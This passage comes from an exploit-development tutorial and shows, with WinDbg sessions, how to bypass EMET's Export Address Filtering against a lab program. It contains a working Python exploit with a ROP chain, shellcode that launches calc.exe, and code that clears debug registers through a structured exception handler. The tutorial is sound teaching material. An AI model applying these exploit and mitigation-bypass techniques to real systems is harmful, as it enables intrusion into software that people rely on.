 
+
 
shellcode
 
        
f
.
write
(
name
)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 242 
-
 
 
write_file
(
r'c:
\
delete
me
\
name.dat'
)
 
 
Note that you need to assign to the variable 
msvcr120
 the correct value. Remember to run and keep open 
the little program we talked about to stop 
msvcr120.dll
 from changing base address. That little program also 
tells us the current base add
ress of 
msvcr120.dll
.
 
Now run
 exploitme3.exe
 and the calculator will pop up!
 
EAF
 
Let’s enable EAF protection for 
exploitme3
 and run 
exploitme3
 again. This time EMET detects our exploit 
and closes 
exploitme3
. The official description of EAF says that it
 
reg
ulates access to the Export Address Table (EAT) based on the calling code.
 
As a side note, before debugging 
exploitme3.exe
, make sure that 
exploitme3.pdb
, which contains debugging 
information, is in the same directory as 
exploitme3.exe
.
 
Let’s open 
exploitm
e3
 in WinDbg (
Ctrl+E
), then put a breakpoint on 
main
:
 
bp exploitme3!main
 
When we hit 
F5
 (go), we get an odd exception:
 
(f74.c20): Single step exception 
-
 code 80000004 (first chance)
 
First chance exceptions are reported before any exception handling.
 
This 
exception may be expected and handled.
 
eax=000bff98 ebx=76462a38 ecx=00000154 edx=763a0000 esi=7645ff70 edi=764614e8
 
eip=76ec01ae esp=003ef214 ebp=003ef290 iopl=0         nv up ei ng nz na pe cy
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b         
    efl=00000287
 
ntdll!LdrpSnapThunk+0x1c1:
 
76ec01ae 03c2            add     eax,edx
 
Here’s the code:
 
76ec018e ff7618          push    dword ptr [esi+18h]
 
76ec0191 ff75e0          push    dword ptr [ebp
-
20h]
 
76ec0194 e819020000      call    ntdll!LdrpNameT
oOrdinal (76ec03b2)
 
76ec0199 8b55d8          mov     edx,dword ptr [ebp
-
28h]
 
76ec019c 0fb7c0          movzx   eax,ax
 
76ec019f 0fb7c8          movzx   ecx,ax
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 243 
-
 
76ec01a2 3b4e14          cmp     ecx,dword ptr [esi+14h]
 
76ec01a5 0f83b6f60000    jae     ntdll!Ldr
pSnapThunk+0x12b (76ecf861)
 
76ec01ab 8b461c          mov     eax,dword ptr [esi+1Ch]   <
----------------
 this generated the exception
 
76ec01ae 03c2            add     eax,edx       <
---------------------
 we're here!
 
76ec01b0 8d0c88          lea     ecx,[ea
x+ecx*4]
 
76ec01b3 8b01            mov     eax,dword ptr [ecx]
 
76ec01b5 03c2            add     eax,edx
 
76ec01b7 8b7d14          mov     edi,dword ptr [ebp+14h]
 
76ec01ba 8907            mov     dword ptr [edi],eax
 
76ec01bc 3bc6            cmp     eax,esi
 
76
ec01be 0f87ca990000    ja      ntdll!LdrpSnapThunk+0x1d7 (76ec9b8e)
 
76ec01c4 833900          cmp     dword ptr [ecx],0
 
A 
single step exception
 is a debugging exception. It’s likely that the exception was generated by the 
previous line of code:
 
76ec01ab 8b4
61c          mov     eax,dword ptr [esi+1Ch]   <
----------------
 this generated the exception
 
Let’s see what 
esi
 points to:
 
0:000> ln @esi
 
(7645ff70)   kernel32!$$VProc_ImageExportDirectory   |  (76480000)   kernel32!BasepAllowResourceConversion
 
Exact matc
hes:
 
    kernel32!$$VProc_ImageExportDirectory = <no type information>
 
It seems that 
esi
 points to 
kernel32
‘s EAT! We can confirm that 
esi
 really points to the 
Export Directory
 
(another name for EAT) this way:
 
0:000> !dh kernel32
 
 
File Type: DLL
 
FILE HEADE
R VALUES
 
     14C machine (i386)
 
       4 number of sections
 
53159A85 time date stamp Tue Mar 04 10:19:01 2014
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 244 
-
 
       0 file pointer to symbol table
 
       0 number of symbols
 
      E0 size of optional header
 
    2102 characteristics
 
            Executabl
e
 
            32 bit word machine
 
            DLL
 
 
OPTIONAL HEADER VALUES
 
     10B magic #
 
    9.00 linker version
 
   D0000 size of code
 
   30000 size of initialized data
 
       0 size of uninitialized data
 
   13293 address of entry point
 
   10000 base of 
code
 
         
-----
 new 
-----
 
763a0000 image base
 
   10000 section alignment
 
   10000 file alignment
 
       3 subsystem (Windows CUI)
 
    6.01 operating system version
 
    6.01 image version
 
    6.01 subsystem version
 
  110000 size of image
 
   10000 size o
f headers
 
  1105AE checksum
 
00040000 size of stack reserve
 
00001000 size of stack commit
 
00100000 size of heap reserve
 
00001000 size of heap commit
 
     140  DLL characteristics
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 245 
-
 
            Dynamic base
 
            NX compatible
 
   BFF70 [    A9B1] address
  of Export Directory      <
----------------------------------
 
   CA924 [     1F4] address  of Import Directory
 
   F0000 [     528] address  of Resource Directory
 
       0 [       0] address  of Exception Directory
 
       0 [       0] address  of Security 
Directory
 
  100000 [    AD9C] address  of Base Relocation Directory
 
   D0734 [      38] address  of Debug Directory
 
       0 [       0] address  of Description Directory
 
       0 [       0] address  of Special Directory
 
       0 [       0] address  of Thre
ad Storage Directory
 
   83510 [      40] address  of Load Configuration Directory
 
       0 [       0] address  of Bound Import Directory
 
   10000 [     DF0] address  of Import Address Table Directory
 
       0 [       0] address  of Delay Import Directory
 
 
      0 [       0] address  of COR20 Header Directory
 
       0 [       0] address  of Reserved Directory
 
 
SECTION HEADER #1
 
   .text name
 
   C0796 virtual size
 
   10000 virtual address
 
   D0000 size of raw data
 
   10000 file pointer to raw data
 
       0 f
ile pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
60000020 flags
 
         Code
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 246 
-
 
         (no align specified)
 
         Execute Read
 
 
Debug Directories(2)
 
  Type       Size  
   Address  Pointer
 
  
cv           26       d0770    d0770    Format: RSDS, guid, 2, wkernel32.pdb
 
  
(    10)       4       d076c    d076c
 
 
SECTION HEADER #2
 
   .data name
 
    100C virtual size
 
   E0000 virtual address
 
   10000 size of raw data
 
   E0000 fi
le pointer to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
C0000040 flags
 
         Initialized Data
 
         (no align specified)
 
         Read Write
 
 
SECTION HEADER #3
 
   .rsrc name
 
     528 virtual size
 
   F0000 virtual address
 
   10000 size of raw data
 
   F0000 file pointer to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 247 
-
 
       0 number of relocations
 
    
   0 number of line numbers
 
40000040 flags
 
         Initialized Data
 
         (no align specified)
 
         Read Only
 
 
SECTION HEADER #4
 
  .reloc name
 
    AD9C virtual size
 
  100000 virtual address
 
   10000 size of raw data
 
  100000 file pointer to raw dat
a
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
42000040 flags
 
         Initialized Data
 
         Discardable
 
         (no align specified)
 
         Read Only
 
We can see that 
esi
 points indeed to the Export Directory:
 
0:000> ? @esi == kernel32 + bff70
 
Evaluate expression: 1 = 00000001            (1 means True)
 
The instruction which generated the exception accessed the Export Directory at offset 
0x1c
. Let’s see w
hat 
there is at that offset by having a look at the file 
winnt.h
:
 
C++
 
 
typedef
 
struct
 
_IMAGE_EXPORT_DIRECTORY
 
{
 
    
DWORD
   
Characteristics
;
          
// 0
 
    
DWORD
   
TimeDateStamp
;
            
// 4
 
    
WORD
    
MajorVersion
;
             
// 8
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 248 
-
 
    
WORD
    
Min
orVersion
;
             
// 0xa
 
    
DWORD
   
Name
;
                     
// 0xc
 
    
DWORD
   
Base
;
                     
// 0x10
 
    
DWORD
   
NumberOfFunctions
;
        
// 0x14
 
    
DWORD
   
NumberOfNames
;
            
// 0x18    
 
    
DWORD
   
AddressOfFunctions
;
       
/
/ 0x1c   <
----------------------
 
    
DWORD
   
AddressOfNames
;
           
// 0x20
 
    
DWORD
   
AddressOfNameOrdinals
;
    
// 0x24
 
}
 
IMAGE_EXPORT_DIRECTORY
,
 
*
PIMAGE_EXPORT_DIRECTORY
;
 
 
In the chapter
 
Shellcode
 we saw that 
A
ddressOfFunctions
 is the 
RVA
 of an array containing the RVAs of the 
exported functions.
 
By looking at the 
stack trace
 we realize that we’re in the function 
GetProcAddress
:
 
0:000> k 10
 
ChildEBP RetAddr  
 
003ef290 76ec032a ntdll!LdrpSnapThunk+0x1c1
 
003ef34c 
76ec0202 ntdll!LdrGetProcedureAddressEx+0x1ca
 
003ef368 76261e59 ntdll!LdrGetProcedureAddress+0x18
 
003ef390 73c8d45e KERNELBASE!GetProcAddress+0x44      <
------------------------
 
003ef3a4 73c8ca0d MSVCR120!__crtLoadWinApiPointers+0x1d [f:
\
dd
\
vctools
\
crt
\
crt
w32
\
misc
\
winapisupp.c @ 752]
 
003ef3a8 73c8ca91 MSVCR120!_mtinit+0x5 [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
tidtable.c @ 97]
 
003ef3d8 73c71a5f MSVCR120!__CRTDLL_INIT+0x2f [f:
\
dd
\
vctools
\
crt
\
crtw32
\
dllstuff
\
crtlib.c @ 235]
 
003ef3ec 76ec99a0 MSVCR120!_CRTDLL_INIT+
0x1c [f:
\
dd
\
vctools
\
crt
\
crtw32
\
dllstuff
\
crtlib.c @ 214]
 
003ef40c 76ecd939 ntdll!LdrpCallInitRoutine+0x14
 
003ef500 76ed686c ntdll!LdrpRunInitializeRoutines+0x26f
 
003ef680 76ed5326 ntdll!LdrpInitializeProcess+0x1400
 
003ef6d0 76ec9ef9 ntdll!_LdrpInitialize+0x
78
 
003ef6e0 00000000 ntdll!LdrInitializeThunk+0x10
 
Since it’s the first time we’ve seen such an exception, it must be EMET’s doing. It seems that EMET’s EAF 
intercepts any accesses to the field 
AddressOfFunctions
 of some Export Directories. Which ones? And
 how 
does it do that?
 
In WinDbg, we could do such a thing by using 
ba
, which relies on hardware breakpoints, so EMET must be 
using the same method. Let’s have a look at the 
debug registers
:
 
0:000> rM 20
 
dr0=76ea0204 dr1=7645ff8c dr2=7628b85c
 
dr3=00000000 d
r6=ffff0ff2 dr7=0fff0115
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 249 
-
 
ntdll!LdrpSnapThunk+0x1c1:
 
76ec01ae 03c2            add     eax,edx
 
(When you don’t know a command, look it up with 
.hh
.)
 
The value in 
dr1
 looks familiar:
 
0:000> ? @dr1 == esi+1c
 
Evaluate expression: 1 = 00000001
 
Perfect match!
 
Deb
ug Registers
 
Let’s be honest here: there’s no need to learn the format of the debug registers. It’s pretty clear that in our 
case 
dr0
, 
dr1
 and 
dr2
 contain the addresses where the hardware breakpoints are. Let’s see where they 
point (we’ve already looked at
 
dr1
):
 
0:000> ln dr0
 
(76ea01e8)   ntdll!$$VProc_ImageExportDirectory+0x1c   |  (76eaf8a0)   ntdll!NtMapUserPhysicalPagesScatter
 
0:000> ln dr1
 
(7645ff70)   kernel32!$$VProc_ImageExportDirectory+0x1c   |  (76480000)   kernel32!BasepAllowResourceConversion
 
0:
000> ln dr2
 
(76288cb0)   KERNELBASE!_NULL_IMPORT_DESCRIPTOR+0x2bac   |  (76291000)   KERNELBASE!KernelBaseGlobalD
ata
 
The first two points to the Export Directories of 
ntdll
 and 
kernel32
 respectively, while the third one looks 
different. Let’s see:
 
0:000> !
dh kernelbase
 
 
File Type: DLL
 
FILE HEADER VALUES
 
     14C machine (i386)
 
       4 number of sections
 
53159A86 time date stamp Tue Mar 04 10:19:02 2014
 
 
       0 file pointer to symbol table
 
       0 number of symbols
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 250 
-
 
      E0 size of optional header
 
    21
02 characteristics
 
            Executable
 
            32 bit word machine
 
            DLL
 
 
OPTIONAL HEADER VALUES
 
     10B magic #
 
    9.00 linker version
 
   3F800 size of code
 
    4400 size of initialized data
 
       0 size of uninitialized data
 
    74C1 
address of entry point
 
    1000 base of code
 
         
-----
 new 
-----
 
76250000 image base
 
    1000 section alignment
 
     200 file alignment
 
       3 subsystem (Windows CUI)
 
    6.01 operating system version
 
    6.01 image version
 
    6.01 subsystem versio
n
 
   47000 size of image
 
     400 size of headers
 
   49E52 checksum
 
00040000 size of stack reserve
 
00001000 size of stack commit
 
00100000 size of heap reserve
 
00001000 size of heap commit
 
     140  DLL characteristics
 
            Dynamic base
 
            N
X compatible
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 251 
-
 
   3B840 [    4F19] address  of Export Directory        <
-------------------------
 
   38C9C [      28] address  of Import Directory
 
   43000 [     530] address  of Resource Directory
 
       0 [       0] address  of Exception Directory
 
       0
 [       0] address  of Security Directory
 
   44000 [    25F0] address  of Base Relocation Directory
 
    1660 [      1C] address  of Debug Directory
 
       0 [       0] address  of Description Directory
 
       0 [       0] address  of Special Directory
 
   
    0 [       0] address  of Thread Storage Directory
 
    69D0 [      40] address  of Load Configuration Directory
 
       0 [       0] address  of Bound Import Directory
 
    1000 [     654] address  of Import Address Table Directory
 
       0 [       0] add
ress  of Delay Import Directory
 
       0 [       0] address  of COR20 Header Directory
 
       0 [       0] address  of Reserved Directory
 
 
SECTION HEADER #1
 
   .text name
 
   3F759 virtual size
 
    1000 virtual address
 
   3F800 size of raw data
 
     400 fi
le pointer to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
60000020 flags
 
         Code
 
         (no align specified)
 
         Execute Read
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 252 
-
 
 
Debug D
irectories(1)
 
  Type       Size     Address  Pointer
 
  cv           28        6a18     5e18    Format: RSDS, guid, 1, wkernelbase.pdb
 
 
SECTION HEADER #2
 
   .data name
 
    11E8 virtual size
 
   41000 virtual address
 
     400 size of raw data
 
   3FC00 file po
inter to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
C0000040 flags
 
         Initialized Data
 
         (no align specified)
 
         Read Write
 
 
SEC
TION HEADER #3
 
   .rsrc name
 
     530 virtual size
 
   43000 virtual address
 
     600 size of raw data
 
   40000 file pointer to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 
number of line numbers
 
40000040 flags
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 253 
-
 
         Initialized Data
 
         (no align specified)
 
         Read Only
 
 
SECTION HEADER #4
 
  .reloc name
 
    2A18 virtual size
 
   44000 virtual address
 
    2C00 size of raw data
 
   40600 file pointer to raw data
 
   
    0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
42000040 flags
 
         Initialized Data
 
         Discardable
 
         (no align specified)
 
         Read Only
 
0:000
> ? kernelbase+3B840+1c
 
Evaluate expression: 1982380124 = 7628b85c    <
----------------------
 
0:000> ? @dr2
 
Evaluate expression: 1982380124 = 7628b85c    <
----------------------
 
No, false alarm: 
dr2
 points to the Export Directory of 
KERNELBASE
!
 
Anyway, jus
t for our curiosity, let’s have a look at the 
Intel Manuals (3B)
. Here’s the format of the debug 
registers:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 254 
-
 
 
It’s quite clear that 
registers 
DR0
, 
DR1
, 
DR2
 and 
DR3
 specify the addresses of the breakpoints. Register 
DR6
 is a status register which reports information about the last debug exception, whereas 
DR7
 contains 
the settings for the 4 breakpoints. If you are interested in the spec
ifics, have a look at the manual yourself.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 
255 
-
 
All we need to know is that to disable the breakpoints we can just clear the debug registers. Indeed, if you 
load 
exploitme3.exe
 in WinDbg and look at the debug registers before EMET modify them, you’ll see the 
fo
llowing:
 
0:000> rM 20
 
dr0=00000000 dr1=00000000 dr2=00000000
 
dr3=00000000 dr6=00000000 dr7=00000000
 
ntdll!LdrpDoDebuggerBreak+0x2c:
 
76f3103b cc              int     3
 
Clearing the debug registers (1)
 
Clearing the debug registers should be easy enough, righ
t? Let’s try it!
 
We can put the code to clear the debug registers right before our shellcode so that our shellcode can access 
the Export Directories with impunity.
 
To generate the machine code, we can write the asm code in Visual Studio, debug the program 
and 
Go to 
the Disassembly
 (right click on an assembly instruction). From there, we can copy and paste the code in 
PyCharm
 and edit the code a bit.
 
Here’s the result:
 
Python
 
 
import
 
struct
 
 
# The signature of VirtualProtect is the following:
 
#   BOOL WINAP
I VirtualProtect(
 
#     _In_   LPVOID lpAddress,
 
#     _In_   SIZE_T dwSize,
 
#     _In_   DWORD flNewProtect,
 
#     _Out_  PDWORD lpflOldProtect
 
#   );
 
 
# After PUSHAD is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RETN
))
 
#   ESI (ptr to JMP [EAX] (EAX = address of ptr to VirtualProtect))
 
#   EBP (ptr to POP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#   EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeab
le address))
 
#   EAX (address of ptr to VirtualProtect)
 
# lpAddress:
 
#   ptr to "call esp"
 
#   <shellcode>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 256 
-
 
 
msvcr120
 
=
 
0x73c60000
 
 
# Delta used to fix the addresses based on the new base address of msvcr120.dll.
 
md
 
=
 
msvcr120
 
-
 
0x70480000
 
 
def
 
create_
rop_chain
(
code_size
):
 
    
rop_gadgets
 
=
 
[
 
      
md
 
+
 
0x7053fc6f
,
  
# POP EBP # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x7053fc6f
,
  
# skip 4 bytes [MSVCR120.dll]
 
      
md
 
+
 
0x704f00f6
,
  
# POP EBX # RETN [MSVCR120.dll]
 
      
code_size
,
        
# code_size 
-
> ebx
 
     
md
 
+
 
0x704b6580
,
  
# POP EDX # RETN [MSVCR120.dll]
 
      
0x00000040
,
       
# 0x00000040
-
> edx
 
      
md
 
+
 
0x7049f8cb
,
  
# POP ECX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705658f2
,
  
# &Writable location [MSVCR120.dll]
 
      
md
 
+
 
0x7048f95c
,
  
# POP EDI # RETN [MSVC
R120.dll]
 
      
md
 
+
 
0x7048f607
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
      
md
 
+
 
0x704eb436
,
  
# POP ESI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x70493a17
,
  
# JMP [EAX] [MSVCR120.dll]
 
      
md
 
+
 
0x7053b8fb
,
  
# POP EAX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705651a4
,
  
# p
tr to &VirtualProtect() [IAT MSVCR120.dll]
 
      
md
 
+
 
0x7053b7f9
,
  
# PUSHAD # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x704b7e5d
,
  
# ptr to 'call esp' [MSVCR120.dll]
 
    
]
 
    
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_file
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
md
 
+
 
0x7048f607
       
# RETN (ROP NOP) [MSVCR120.dll]
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xf
c
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
  
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
            
"
\
x
89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5
e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
disable_EAF
 
=
 
(
 
            
"
\
x33
\
xC0"
 
+
         
# xor    eax,eax
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 257 
-
 
            
"
\
x0F
\
x23
\
xC0"
 
+
     
# mov    dr0,eax
 
            
"
\
x0F
\
x23
\
xC8"
 
+
     
# mov    dr1,eax
 
            
"
\
x0F
\
x23
\
xD0"
 
+
     
# mov    dr2,eax
 
            
"
\
x0F
\
x23
\
xD8"
 
+
     
# mov    dr3,eax
 
            
"
\
x0F
\
x23
\
xF0"
 
+
     
# mov    dr6,eax
 
            
"
\
x0F
\
x23
\
xF8"
       
# mov    dr7,eax
 
        
)
 
        
code
 
=
 
disable_EAF
 
+
 
shellcode
 
        
name
 
=
 
'a'
*
36
 
+
 
struct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
create_rop_chain
(
len
(
code
))
 
+
 
code
 
        
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
deleteme
\
name.dat'
)
 
 
If we execute 
exploitme3
 w
e get a glorious crash!
 
Let’s open it in WinDbg and hit 
F5
 (go). The execution should stop because of a single step exception. To 
ignore these annoying exceptions, we can tell WinDbg to ignore 
first
-
chance
 single step exceptions with the 
following command:
 
sxd sse
 
where 
sse
 stands for 
S
ingle 
S
tep 
E
xception.
 
Right after we hit 
F5
 again, another exception is generated and we recognize our code:
 
0034d64a 0f23c0          mov     dr0,eax      <
--------------
 exception generated here
 
0034d64d 0f23c8          mov 
    dr1,eax
 
0034d650 0f23d0          mov     dr2,eax
 
0034d653 0f23d8          mov     dr3,eax
 
0034d656 0f23f0          mov     dr6,eax
 
0034d659 0f23f8          mov     dr7,eax
 
The problem is that we can’t modify the debug registers in 
user mode
 (
ring 3
). T
he only way to do it is to 
delegate this task to the 
OS
.
 
Clearing the debug registers (2)
 
I googled for “
mov dr0 privileged instruction
” and I found this page:
 
http://www.
symantec.com/connect/articles/windows
-
anti
-
debug
-
reference
 
There, we can find a method to modify the debug registers. The method consists in defining an exception 
handler and generating an exception such as a 
division by zero
. When the exception is genera
ted, Windows 
will call the exception handler passing it a pointer to a 
CONTEXT
 data structure as first and only argument. 
The 
CONTEXT
 data structure contains the values of the registers when the exception was generated. The 
handler can modify the values in
 the 
CONTEXT
 data structure and, after the handler returns, Windows will 
propagate the changes to the real registers. This way, we can change the debug registers.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 258 
-
 
Here’s the code found on that page:
 
Assembly (x86)
 
 
push
 
offset
 
handler
 
push
 
dword
 
ptr
 
fs
:[
0
]
 
mov
 
fs
:[
0
],
esp
 
xor
 
eax
,
 
eax
 
div
 
eax
 
;generate exception
 
pop
 
fs
:[
0
]
 
add
 
esp
,
 
4
 
;continue execution
 
;...
 
handler
:
 
mov
 
ecx
,
 
[
esp
+
0Ch
]
 
;skip div
 
add
 
dword
 
ptr
 
[
ecx
+
0B8h
],
 
2
 
;skip div
 
mov
 
dword
 
ptr
 
[
ecx
+
04h
],
 
0
 
;clean dr0
 
mov
 
dword
 
ptr
 
[
ecx
+
08h
],
 
0
 
;clean dr1
 
mov
 
dword
 
ptr
 
[
ecx
+
0Ch
],
 
0
 
;clean dr2
 
mov
 
dword
 
ptr
 
[
ecx
+
10h
],
 
0
 
;clean dr3
 
mov
 
dword
 
ptr
 
[
ecx
+
14h
],
 
0
 
;clean dr6
 
mov
 
dword
 
ptr
 
[
ecx
+
18h
],
 
0
 
;clean dr7
 
xor
 
eax
,
 
eax
 
ret
 
 
And here’s our C/C++ code:
 
C++
 
 
#include <Windows.h>
 
#include <winnt.h>
 
#include <stdi
o.h>
 
 
int
 
main
()
 
{
 
    
CONTEXT
 
context
;
 
    
printf
(
"sizeof(context) = 0x%x
\
n"
,
 
sizeof
(
context
));
 
    
printf
(
"contextFlags offset = 0x%x
\
n"
,
 
(
int
)&
context
.
ContextFlags
 
-
 
(
int
)&
context
);
 
    
printf
(
"CONTEXT_DEBUG_REGISTERS = 0x%x
\
n"
,
 
CONTEXT_DEBUG_REGISTERS
);
 
    
printf
(
"EIP offset = 0x%x
\
n"
,
 
(
int
)&
context
.
Eip
 
-
 
(
int
)&
context
);
 
    
printf
(
"Dr0 offset = 0x%x
\
n"
,
 
(
int
)&
context
.
Dr0
 
-
 
(
int
)&
context
);
 
    
printf
(
"Dr1 offset = 0x%x
\
n"
,
 
(
int
)&
context
.
Dr1
 
-
 
(
int
)&
context
);
 
    
printf
(
"Dr2 offset = 0x%x
\
n"
,
 
(
int
)&
con
text
.
Dr2
 
-
 
(
int
)&
context
);
 
    
printf
(
"Dr3 offset = 0x%x
\
n"
,
 
(
int
)&
context
.
Dr3
 
-
 
(
int
)&
context
);
 
    
printf
(
"Dr6 offset = 0x%x
\
n"
,
 
(
int
)&
context
.
Dr6
 
-
 
(
int
)&
context
);
 
    
printf
(
"Dr7 offset = 0x%x
\
n"
,
 
(
int
)&
context
.
Dr7
 
-
 
(
int
)&
context
);
 
 
_asm
 
{
 
      
// Attach handler to the exception handler chain.
 
        
call
    
here
 
    
here
:
 
        
add
     
dword
 
ptr
 
[
esp
],
 
0x22
       
// [esp] = handler
 
        
push
    
dword
 
ptr
 
fs
:[
0
]
 
        
mov
     
fs
:[
0
],
 
esp
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 259 
-
 
 
// Generate the exception.
 
        
xor
 
    
eax
,
 
eax
 
        
div
     
eax
 
 
// Restore the exception handler chain.
 
        
pop
     
dword
 
ptr
 
fs
:[
0
]
 
        
add
     
esp
,
 
4
 
        
jmp
     
skip
 
 
handler
:
 
        
mov
     
ecx
,
 
[
esp
 
+
 
0Ch
];
 
skip
 
div
 
        
add
     
dword
 
ptr
 
[
ecx
 
+
 
0B8h
]
,
 
2
               
// skip the "div eax" instruction
 
        
xor
     
eax
,
 
eax
 
        
mov
     
dword
 
ptr
 
[
ecx
 
+
 
